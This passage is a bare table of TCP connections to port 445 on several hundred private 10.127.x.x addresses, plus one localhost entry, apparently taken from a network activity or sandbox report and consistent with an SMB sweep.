| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.192:445 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.1.211:445 | tcp | |
| N/A | 10.127.1.248:445 | tcp | |
| N/A | 10.127.1.252:445 | tcp | |
| N/A | 10.127.1.208:445 | tcp | |
| N/A | 10.127.1.241:445 | tcp | |
| N/A | 10.127.1.240:445 | tcp | |
| N/A | 10.127.1.230:445 | tcp | |
| N/A | 10.127.1.197:445 | tcp | |
| N/A | 10.127.1.216:445 | tcp | |
| N/A | 10.127.2.0:445 | tcp | |
| N/A | 10.127.1.196:445 | tcp | |
| N/A | 10.127.1.206:445 | tcp | |
| N/A | 10.127.1.246:445 | tcp | |
| N/A | 10.127.1.210:445 | tcp | |
| N/A | 10.127.1.199:445 | tcp | |
| N/A | 10.127.1.221:445 | tcp | |
| N/A | 10.127.1.235:445 | tcp | |
| N/A | 10.127.1.238:445 | tcp | |
| N/A | 10.127.1.236:445 | tcp | |
| N/A | 10.127.1.218:445 | tcp | |
| N/A | 10.127.1.198:445 | tcp | |
| N/A | 10.127.1.249:445 | tcp | |
| N/A | 10.127.1.245:445 | tcp | |
| N/A | 10.127.1.228:445 | tcp | |
| N/A | 10.127.1.239:445 | tcp | |
| N/A | 10.127.1.212:445 | tcp | |
| N/A | 10.127.1.226:445 | tcp | |
| N/A | 10.127.1.217:445 | tcp | |
| N/A | 10.127.1.219:445 | tcp | |
| N/A | 10.127.1.242:445 | tcp | |
| N/A | 10.127.1.201:445 | tcp | |
| N/A | 10.127.1.251:445 | tcp | |
| N/A | 10.127.1.214:445 | tcp | |
| N/A | 10.127.1.215:445 | tcp | |
| N/A | 10.127.1.229:445 | tcp | |
| N/A | 10.127.1.195:445 | tcp | |
| N/A | 10.127.1.243:445 | tcp | |
| N/A | 10.127.1.194:445 | tcp | |
| N/A | 10.127.1.224:445 | tcp | |
| N/A | 10.127.1.204:445 | tcp | |
| N/A | 10.127.1.213:445 | tcp | |
| N/A | 10.127.1.250:445 | tcp | |
| N/A | 10.127.1.203:445 | tcp | |
| N/A | 10.127.1.220:445 | tcp | |
| N/A | 10.127.1.253:445 | tcp | |
| N/A | 10.127.1.225:445 | tcp | |
| N/A | 10.127.1.234:445 | tcp | |
| N/A | 10.127.1.202:445 | tcp | |
| N/A | 10.127.1.209:445 | tcp | |
| N/A | 10.127.1.254:445 | tcp | |
| N/A | 10.127.1.255:445 | tcp | |
| N/A | 10.127.1.200:445 | tcp | |
| N/A | 10.127.1.244:445 | tcp | |
| N/A | 10.127.1.231:445 | tcp | |
| N/A | 10.127.1.233:445 | tcp | |
| N/A | 10.127.1.193:445 | tcp | |
| N/A | 10.127.1.223:445 | tcp | |
| N/A | 10.127.1.237:445 | tcp | |
| N/A | 10.127.1.227:445 | tcp | |
| N/A | 10.127.1.247:445 | tcp | |
| N/A | 10.127.1.222:445 | tcp | |
| N/A | 10.127.1.232:445 | tcp | |
| N/A | 10.127.1.207:445 | tcp | |
| N/A | 10.127.1.205:445 | tcp | |
| N/A | 10.127.2.25:445 | tcp | |
| N/A | 10.127.2.10:445 | tcp | |
| N/A | 10.127.2.51:445 | tcp | |
| N/A | 10.127.2.62:445 | tcp | |
| N/A | 10.127.2.46:445 | tcp | |
| N/A | 10.127.2.36:445 | tcp | |
| N/A | 10.127.2.38:445 | tcp | |
| N/A | 10.127.2.19:445 | tcp | |
| N/A | 10.127.2.20:445 | tcp | |
| N/A | 10.127.2.24:445 | tcp | |
| N/A | 10.127.2.30:445 | tcp | |
| N/A | 10.127.2.3:445 | tcp | |
| N/A | 10.127.2.43:445 | tcp | |
| N/A | 10.127.2.22:445 | tcp | |
| N/A | 10.127.2.40:445 | tcp | |
| N/A | 10.127.2.34:445 | tcp | |
| N/A | 10.127.2.27:445 | tcp | |
| N/A | 10.127.2.6:445 | tcp | |
| N/A | 10.127.2.48:445 | tcp | |
| N/A | 10.127.2.55:445 | tcp | |
| N/A | 10.127.2.26:445 | tcp | |
| N/A | 10.127.2.18:445 | tcp | |
| N/A | 10.127.2.41:445 | tcp | |
| N/A | 10.127.2.54:445 | tcp | |
| N/A | 10.127.2.2:445 | tcp | |
| N/A | 10.127.2.1:445 | tcp | |
| N/A | 10.127.2.21:445 | tcp | |
| N/A | 10.127.2.17:445 | tcp | |
| N/A | 10.127.2.15:445 | tcp | |
| N/A | 10.127.2.52:445 | tcp | |
| N/A | 10.127.2.13:445 | tcp | |
| N/A | 10.127.2.63:445 | tcp | |
| N/A | 10.127.2.59:445 | tcp | |
| N/A | 10.127.2.7:445 | tcp | |
| N/A | 10.127.2.50:445 | tcp | |
| N/A | 10.127.2.45:445 | tcp | |
| N/A | 10.127.2.5:445 | tcp | |
| N/A | 10.127.2.60:445 | tcp | |
| N/A | 10.127.2.28:445 | tcp | |
| N/A | 10.127.2.9:445 | tcp | |
| N/A | 10.127.2.61:445 | tcp | |
| N/A | 10.127.2.11:445 | tcp | |
| N/A | 10.127.2.53:445 | tcp | |
| N/A | 10.127.2.23:445 | tcp | |
| N/A | 10.127.2.32:445 | tcp | |
| N/A | 10.127.2.8:445 | tcp | |
| N/A | 10.127.2.42:445 | tcp | |
| N/A | 10.127.2.56:445 | tcp | |
| N/A | 10.127.2.58:445 | tcp | |
| N/A | 10.127.2.39:445 | tcp | |
| N/A | 10.127.2.64:445 | tcp | |
| N/A | 10.127.2.33:445 | tcp | |
| N/A | 10.127.2.4:445 | tcp | |
| N/A | 10.127.2.14:445 | tcp | |
| N/A | 10.127.2.35:445 | tcp | |
| N/A | 10.127.2.47:445 | tcp | |
| N/A | 10.127.2.49:445 | tcp | |
| N/A | 10.127.2.29:445 | tcp | |
| N/A | 10.127.2.16:445 | tcp | |
| N/A | 10.127.2.57:445 | tcp | |
| N/A | 10.127.2.12:445 | tcp | |
| N/A | 10.127.2.31:445 | tcp | |
| N/A | 10.127.2.37:445 | tcp | |
| N/A | 10.127.2.44:445 | tcp | |
| N/A | 10.127.2.71:445 | tcp | |
| N/A | 10.127.2.110:445 | tcp | |
| N/A | 10.127.2.103:445 | tcp | |
| N/A | 10.127.2.91:445 | tcp | |
| N/A | 10.127.2.125:445 | tcp | |
| N/A | 10.127.2.109:445 | tcp | |
| N/A | 10.127.2.68:445 | tcp | |
| N/A | 10.127.2.78:445 | tcp | |
| N/A | 10.127.2.122:445 | tcp | |
| N/A | 10.127.2.70:445 | tcp | |
| N/A | 10.127.2.118:445 | tcp | |
| N/A | 10.127.2.89:445 | tcp | |
| N/A | 10.127.2.119:445 | tcp | |
| N/A | 10.127.2.111:445 | tcp | |
| N/A | 10.127.2.113:445 | tcp | |
| N/A | 10.127.2.90:445 | tcp | |
| N/A | 10.127.2.76:445 | tcp | |
| N/A | 10.127.2.66:445 | tcp | |
| N/A | 10.127.2.115:445 | tcp | |
| N/A | 10.127.2.121:445 | tcp | |
| N/A | 10.127.2.120:445 | tcp | |
| N/A | 10.127.2.95:445 | tcp | |
| N/A | 10.127.2.106:445 | tcp | |
| N/A | 10.127.2.72:445 | tcp | |
| N/A | 10.127.2.80:445 | tcp | |
| N/A | 10.127.2.83:445 | tcp | |
| N/A | 10.127.2.65:445 | tcp | |
| N/A | 10.127.2.94:445 | tcp | |
| N/A | 10.127.2.92:445 | tcp | |
| N/A | 10.127.2.67:445 | tcp | |
| N/A | 10.127.2.82:445 | tcp | |
| N/A | 10.127.2.101:445 | tcp | |
| N/A | 10.127.2.77:445 | tcp | |
| N/A | 10.127.2.74:445 | tcp | |
| N/A | 10.127.2.102:445 | tcp | |
| N/A | 10.127.2.117:445 | tcp | |
| N/A | 10.127.2.124:445 | tcp | |
| N/A | 10.127.2.112:445 | tcp | |
| N/A | 10.127.2.73:445 | tcp | |
| N/A | 10.127.2.75:445 | tcp | |
| N/A | 10.127.2.100:445 | tcp | |
| N/A | 10.127.2.126:445 | tcp | |
| N/A | 10.127.2.93:445 | tcp | |
| N/A | 10.127.2.127:445 | tcp | |
| N/A | 10.127.2.81:445 | tcp | |
| N/A | 10.127.2.104:445 | tcp | |
| N/A | 10.127.2.99:445 | tcp | |
| N/A | 10.127.2.96:445 | tcp | |
| N/A | 10.127.2.105:445 | tcp | |
| N/A | 10.127.2.88:445 | tcp | |
| N/A | 10.127.2.85:445 | tcp | |
| N/A | 10.127.2.116:445 | tcp | |
| N/A | 10.127.2.128:445 | tcp | |
| N/A | 10.127.2.114:445 | tcp | |
| N/A | 10.127.2.69:445 | tcp | |
| N/A | 10.127.2.84:445 | tcp | |
| N/A | 10.127.2.86:445 | tcp | |
| N/A | 10.127.2.107:445 | tcp | |
| N/A | 10.127.2.87:445 | tcp | |
| N/A | 10.127.2.108:445 | tcp | |
| N/A | 10.127.2.79:445 | tcp | |
| N/A | 10.127.2.97:445 | tcp | |
| N/A | 10.127.2.98:445 | tcp | |
| N/A | 10.127.2.123:445 | tcp | |
| N/A | 10.127.2.135:445 | tcp | |
| N/A | 10.127.2.168:445 | tcp | |
| N/A | 10.127.2.130:445 | tcp | |
| N/A | 10.127.2.173:445 | tcp | |
| N/A | 10.127.2.180:445 | tcp | |
| N/A | 10.127.2.191:445 | tcp | |
| N/A | 10.127.2.149:445 | tcp | |
| N/A | 10.127.2.148:445 | tcp | |
| N/A | 10.127.2.175:445 | tcp | |
| N/A | 10.127.2.178:445 | tcp | |
| N/A | 10.127.2.137:445 | tcp | |
| N/A | 10.127.2.160:445 | tcp | |
| N/A | 10.127.2.185:445 | tcp | |
| N/A | 10.127.2.143:445 | tcp | |
| N/A | 10.127.2.145:445 | tcp | |
| N/A | 10.127.2.150:445 | tcp | |
| N/A | 10.127.2.176:445 | tcp | |
| N/A | 10.127.2.187:445 | tcp | |
| N/A | 10.127.2.188:445 | tcp | |
| N/A | 10.127.2.162:445 | tcp | |
| N/A | 10.127.2.172:445 | tcp | |
| N/A | 10.127.2.144:445 | tcp | |
| N/A | 10.127.2.167:445 | tcp | |
| N/A | 10.127.2.140:445 | tcp | |
| N/A | 10.127.2.152:445 | tcp | |
| N/A | 10.127.2.181:445 | tcp | |
| N/A | 10.127.2.170:445 | tcp | |
| N/A | 10.127.2.161:445 | tcp | |
| N/A | 10.127.2.132:445 | tcp | |
| N/A | 10.127.2.138:445 | tcp | |
| N/A | 10.127.2.142:445 | tcp | |
| N/A | 10.127.2.131:445 | tcp | |
| N/A | 10.127.2.141:445 | tcp | |
| N/A | 10.127.2.153:445 | tcp | |
| N/A | 10.127.2.184:445 | tcp | |
| N/A | 10.127.2.179:445 | tcp | |
| N/A | 10.127.2.136:445 | tcp | |
| N/A | 10.127.2.164:445 | tcp | |
| N/A | 10.127.2.165:445 | tcp | |
| N/A | 10.127.2.174:445 | tcp | |
| N/A | 10.127.2.186:445 | tcp | |
| N/A | 10.127.2.157:445 | tcp | |
| N/A | 10.127.2.158:445 | tcp | |
| N/A | 10.127.2.146:445 | tcp | |
| N/A | 10.127.2.159:445 | tcp | |
| N/A | 10.127.2.190:445 | tcp | |
| N/A | 10.127.2.134:445 | tcp | |
| N/A | 10.127.2.155:445 | tcp | |
| N/A | 10.127.2.171:445 | tcp | |
| N/A | 10.127.2.154:445 | tcp | |
| N/A | 10.127.2.151:445 | tcp | |
| N/A | 10.127.2.189:445 | tcp | |
| N/A | 10.127.2.133:445 | tcp | |
| N/A | 10.127.2.182:445 | tcp | |
| N/A | 10.127.2.163:445 | tcp | |
| N/A | 10.127.2.166:445 | tcp | |
| N/A | 10.127.2.139:445 | tcp | |
| N/A | 10.127.2.177:445 | tcp | |
| N/A | 10.127.2.169:445 | tcp | |
| N/A | 10.127.2.156:445 | tcp | |
| N/A | 10.127.2.183:445 | tcp | |
| N/A | 10.127.2.192:445 | tcp | |
| N/A | 10.127.2.129:445 | tcp | |
| N/A | 10.127.2.147:445 | tcp | |
| N/A | 10.127.2.194:445 | tcp | |
| N/A | 10.127.2.210:445 | tcp | |
| N/A | 10.127.2.243:445 | tcp | |
| N/A | 10.127.2.197:445 | tcp | |
| N/A | 10.127.2.219:445 | tcp | |
| N/A | 10.127.2.200:445 | tcp | |
| N/A | 10.127.2.222:445 | tcp | |
| N/A | 10.127.2.241:445 | tcp | |
| N/A | 10.127.2.255:445 | tcp | |
| N/A | 10.127.2.213:445 | tcp | |
| N/A | 10.127.2.214:445 | tcp | |
| N/A | 10.127.2.251:445 | tcp | |
| N/A | 10.127.2.220:445 | tcp | |
| N/A | 10.127.2.244:445 | tcp | |
| N/A | 10.127.2.203:445 | tcp | |
| N/A | 10.127.2.246:445 | tcp | |
| N/A | 10.127.2.217:445 | tcp | |
| N/A | 10.127.2.226:445 | tcp | |
| N/A | 10.127.2.234:445 | tcp | |
| N/A | 10.127.2.223:445 | tcp | |
| N/A | 10.127.3.0:445 | tcp | |
| N/A | 10.127.2.240:445 | tcp | |
| N/A | 10.127.2.215:445 | tcp | |
| N/A | 10.127.2.198:445 | tcp | |
| N/A | 10.127.2.224:445 | tcp | |
| N/A | 10.127.2.196:445 | tcp | |
| N/A | 10.127.2.199:445 | tcp | |
| N/A | 10.127.2.206:445 | tcp | |
| N/A | 10.127.2.229:445 | tcp | |
| N/A | 10.127.2.212:445 | tcp | |
| N/A | 10.127.2.201:445 | tcp | |
| N/A | 10.127.2.193:445 | tcp | |
| N/A | 10.127.2.202:445 | tcp | |
| N/A | 10.127.2.211:445 | tcp | |
| N/A | 10.127.2.242:445 | tcp | |
| N/A | 10.127.2.236:445 | tcp | |
| N/A | 10.127.2.247:445 | tcp | |
| N/A | 10.127.2.216:445 | tcp | |
| N/A | 10.127.2.228:445 | tcp | |
| N/A | 10.127.2.231:445 | tcp | |
| N/A | 10.127.2.254:445 | tcp | |
| N/A | 10.127.2.249:445 | tcp | |
| N/A | 10.127.2.218:445 | tcp | |
| N/A | 10.127.2.252:445 | tcp | |
| N/A | 10.127.2.195:445 | tcp | |
| N/A | 10.127.2.239:445 | tcp | |
| N/A | 10.127.2.248:445 | tcp | |
| N/A | 10.127.2.205:445 | tcp | |
| N/A | 10.127.2.208:445 | tcp | |
| N/A | 10.127.2.221:445 | tcp | |
| N/A | 10.127.2.238:445 | tcp | |
| N/A | 10.127.2.230:445 | tcp | |
| N/A | 10.127.2.233:445 | tcp | |
| N/A | 10.127.2.235:445 | tcp | |
| N/A | 10.127.2.204:445 | tcp | |
| N/A | 10.127.2.245:445 | tcp | |
| N/A | 10.127.2.250:445 | tcp | |
| N/A | 10.127.2.207:445 | tcp | |
| N/A | 10.127.2.225:445 | tcp | |
| N/A | 10.127.2.237:445 | tcp | |
| N/A | 10.127.2.227:445 | tcp | |
| N/A | 10.127.2.232:445 | tcp | |
| N/A | 10.127.2.209:445 | tcp | |
| N/A | 10.127.2.253:445 | tcp | |
| N/A | 10.127.3.27:445 | tcp | |
| N/A | 10.127.3.5:445 | tcp | |
| N/A | 10.127.3.52:445 | tcp | |
| N/A | 10.127.3.53:445 | tcp | |
| N/A | 10.127.3.60:445 | tcp | |
| N/A | 10.127.3.24:445 | tcp | |
| N/A | 10.127.3.43:445 | tcp | |
| N/A | 10.127.3.48:445 | tcp | |
| N/A | 10.127.3.51:445 | tcp | |
| N/A | 10.127.3.29:445 | tcp | |
| N/A | 10.127.3.6:445 | tcp | |
| N/A | 10.127.3.41:445 | tcp | |
| N/A | 10.127.3.63:445 | tcp | |
| N/A | 10.127.3.25:445 | tcp | |
| N/A | 10.127.3.7:445 | tcp | |
| N/A | 10.127.3.40:445 | tcp | |
| N/A | 10.127.3.57:445 | tcp | |
| N/A | 10.127.3.4:445 | tcp | |
| N/A | 10.127.3.15:445 | tcp | |
| N/A | 10.127.3.20:445 | tcp | |
| N/A | 10.127.3.56:445 | tcp | |
| N/A | 10.127.3.33:445 | tcp | |
| N/A | 10.127.3.31:445 | tcp | |
| N/A | 10.127.3.8:445 | tcp | |
| N/A | 10.127.3.17:445 | tcp | |
| N/A | 10.127.3.35:445 | tcp | |
| N/A | 10.127.3.19:445 | tcp | |
| N/A | 10.127.3.44:445 | tcp | |
| N/A | 10.127.3.23:445 | tcp | |
| N/A | 10.127.3.45:445 | tcp | |
| N/A | 10.127.3.47:445 | tcp | |
| N/A | 10.127.3.14:445 | tcp | |
| N/A | 10.127.3.49:445 | tcp | |
| N/A | 10.127.3.54:445 | tcp | |
| N/A | 10.127.3.13:445 | tcp | |
| N/A | 10.127.3.38:445 | tcp | |
| N/A | 10.127.3.3:445 | tcp | |
| N/A | 10.127.3.12:445 | tcp | |
| N/A | 10.127.3.64:445 | tcp | |
| N/A | 10.127.3.21:445 | tcp | |
| N/A | 10.127.3.30:445 | tcp | |
| N/A | 10.127.3.22:445 | tcp | |
| N/A | 10.127.3.2:445 | tcp | |
| N/A | 10.127.3.37:445 | tcp | |
| N/A | 10.127.3.62:445 | tcp | |
| N/A | 10.127.3.28:445 | tcp | |
| N/A | 10.127.3.1:445 | tcp | |
| N/A | 10.127.3.26:445 | tcp | |
| N/A | 10.127.3.39:445 | tcp | |
| N/A | 10.127.3.16:445 | tcp | |
| N/A | 10.127.3.55:445 | tcp | |
| N/A | 10.127.3.36:445 | tcp | |
| N/A | 10.127.3.10:445 | tcp | |
| N/A | 10.127.3.58:445 | tcp | |
| N/A | 10.127.3.61:445 | tcp | |
| N/A | 10.127.3.18:445 | tcp | |
| N/A | 10.127.3.34:445 | tcp | |
| N/A | 10.127.3.42:445 | tcp | |
| N/A | 10.127.3.50:445 | tcp | |
| N/A | 10.127.3.32:445 | tcp | |
| N/A | 10.127.3.9:445 | tcp | |
| N/A | 10.127.3.46:445 | tcp | |
| N/A | 10.127.3.11:445 | tcp | |
| N/A | 10.127.3.59:445 | tcp | |
| N/A | 10.127.3.107:445 | tcp | |
| N/A | 10.127.3.113:445 | tcp | |
| N/A | 10.127.3.75:445 | tcp | |
| N/A | 10.127.3.83:445 | tcp | |
| N/A | 10.127.3.109:445 | tcp | |
| N/A | 10.127.3.89:445 | tcp | |
| N/A | 10.127.3.111:445 | tcp | |
| N/A | 10.127.3.122:445 | tcp | |
| N/A | 10.127.3.117:445 | tcp | |
| N/A | 10.127.3.114:445 | tcp | |
| N/A | 10.127.3.125:445 | tcp | |
| N/A | 10.127.3.128:445 | tcp | |
| N/A | 10.127.3.102:445 | tcp | |
| N/A | 10.127.3.124:445 | tcp | |
| N/A | 10.127.3.66:445 | tcp | |
| N/A | 10.127.3.120:445 | tcp | |
| N/A | 10.127.3.69:445 | tcp | |
| N/A | 10.127.3.127:445 | tcp | |
| N/A | 10.127.3.119:445 | tcp | |
| N/A | 10.127.3.84:445 | tcp | |
| N/A | 10.127.3.97:445 | tcp | |
| N/A | 10.127.3.88:445 | tcp | |
| N/A | 10.127.3.70:445 | tcp | |
| N/A | 10.127.3.71:445 | tcp | |
| N/A | 10.127.3.104:445 | tcp | |
| N/A | 10.127.3.74:445 | tcp | |
| N/A | 10.127.3.106:445 | tcp | |
| N/A | 10.127.3.92:445 | tcp | |
| N/A | 10.127.3.93:445 | tcp | |
| N/A | 10.127.3.98:445 | tcp | |
| N/A | 10.127.3.100:445 | tcp | |
| N/A | 10.127.3.91:445 | tcp | |
| N/A | 10.127.3.94:445 | tcp | |
| N/A | 10.127.3.123:445 | tcp | |
| N/A | 10.127.3.101:445 | tcp | |
| N/A | 10.127.3.118:445 | tcp | |
| N/A | 10.127.3.126:445 | tcp | |
| N/A | 10.127.3.76:445 | tcp | |
| N/A | 10.127.3.87:445 | tcp | |
| N/A | 10.127.3.82:445 | tcp | |
| N/A | 10.127.3.85:445 | tcp | |
| N/A | 10.127.3.103:445 | tcp | |
| N/A | 10.127.3.77:445 | tcp | |
| N/A | 10.127.3.110:445 | tcp | |
| N/A | 10.127.3.81:445 | tcp | |
| N/A | 10.127.3.99:445 | tcp | |
| N/A | 10.127.3.121:445 | tcp | |
| N/A | 10.127.3.67:445 | tcp | |
| N/A | 10.127.3.105:445 | tcp | |
| N/A | 10.127.3.73:445 | tcp | |
| N/A | 10.127.3.72:445 | tcp | |
| N/A | 10.127.3.116:445 | tcp | |
| N/A | 10.127.3.95:445 | tcp | |
| N/A | 10.127.3.96:445 | tcp | |
| N/A | 10.127.3.79:445 | tcp | |
| N/A | 10.127.3.90:445 | tcp | |
| N/A | 10.127.3.78:445 | tcp | |
| N/A | 10.127.3.80:445 | tcp | |
| N/A | 10.127.3.68:445 | tcp | |
| N/A | 10.127.3.86:445 | tcp | |
| N/A | 10.127.3.65:445 | tcp | |
| N/A | 10.127.3.112:445 | tcp | |
| N/A | 10.127.3.115:445 | tcp | |
| N/A | 10.127.3.108:445 | tcp | |
| N/A | 127.0.0.1:31465 | tcp | |
| N/A | 10.127.3.135:445 | tcp | |
| N/A | 10.127.3.130:445 | tcp | |
| N/A | 10.127.3.185:445 | tcp | |
| N/A | 10.127.3.190:445 | tcp | |
| N/A | 10.127.3.166:445 | tcp | |
| N/A | 10.127.3.168:445 | tcp | |
| N/A | 10.127.3.150:445 | tcp | |
| N/A | 10.127.3.180:445 | tcp | |
| N/A | 10.127.3.129:445 | tcp | |
| N/A | 10.127.3.167:445 | tcp | |
| N/A | 10.127.3.163:445 | tcp | |
| N/A | 10.127.3.178:445 | tcp | |
| N/A | 10.127.3.131:445 | tcp | |
| N/A | 10.127.3.177:445 | tcp | |
| N/A | 10.127.3.165:445 | tcp | |
| N/A | 10.127.3.181:445 | tcp | |
| N/A | 10.127.3.137:445 | tcp | |
| N/A | 10.127.3.164:445 | tcp | |
| N/A | 10.127.3.170:445 | tcp | |
| N/A | 10.127.3.142:445 | tcp | |
| N/A | 10.127.3.147:445 | tcp | |
| N/A | 10.127.3.148:445 | tcp | |
| N/A | 10.127.3.149:445 | tcp | |
| N/A | 10.127.3.192:445 | tcp | |
| N/A | 10.127.3.140:445 | tcp | |
| N/A | 10.127.3.191:445 | tcp | |
| N/A | 10.127.3.184:445 | tcp | |
| N/A | 10.127.3.179:445 | tcp | |
| N/A | 10.127.3.138:445 | tcp | |
| N/A | 10.127.3.143:445 | tcp | |
| N/A | 10.127.3.146:445 | tcp | |
| N/A | 10.127.3.160:445 | tcp | |
| N/A | 10.127.3.182:445 | tcp | |
| N/A | 10.127.3.175:445 | tcp | |
| N/A | 10.127.3.187:445 | tcp | |
| N/A | 10.127.3.159:445 | tcp | |
| N/A | 10.127.3.162:445 | tcp | |
| N/A | 10.127.3.133:445 | tcp | |
| N/A | 10.127.3.145:445 | tcp | |
| N/A | 10.127.3.155:445 | tcp | |
| N/A | 10.127.3.174:445 | tcp | |
| N/A | 10.127.3.153:445 | tcp | |
| N/A | 10.127.3.172:445 | tcp | |
| N/A | 10.127.3.171:445 | tcp | |
| N/A | 10.127.3.157:445 | tcp | |
| N/A | 10.127.3.154:445 | tcp | |
| N/A | 10.127.3.176:445 | tcp | |
| N/A | 10.127.3.136:445 | tcp | |
| N/A | 10.127.3.141:445 | tcp | |
| N/A | 10.127.3.151:445 | tcp | |
| N/A | 10.127.3.152:445 | tcp | |
| N/A | 10.127.3.173:445 | tcp | |
| N/A | 10.127.3.156:445 | tcp | |
| N/A | 10.127.3.161:445 | tcp | |
| N/A | 10.127.3.189:445 | tcp | |
| N/A | 10.127.3.132:445 | tcp | |
| N/A | 10.127.3.169:445 | tcp | |
| N/A | 10.127.3.188:445 | tcp | |
| N/A | 10.127.3.158:445 | tcp | |
| N/A | 10.127.3.183:445 | tcp | |
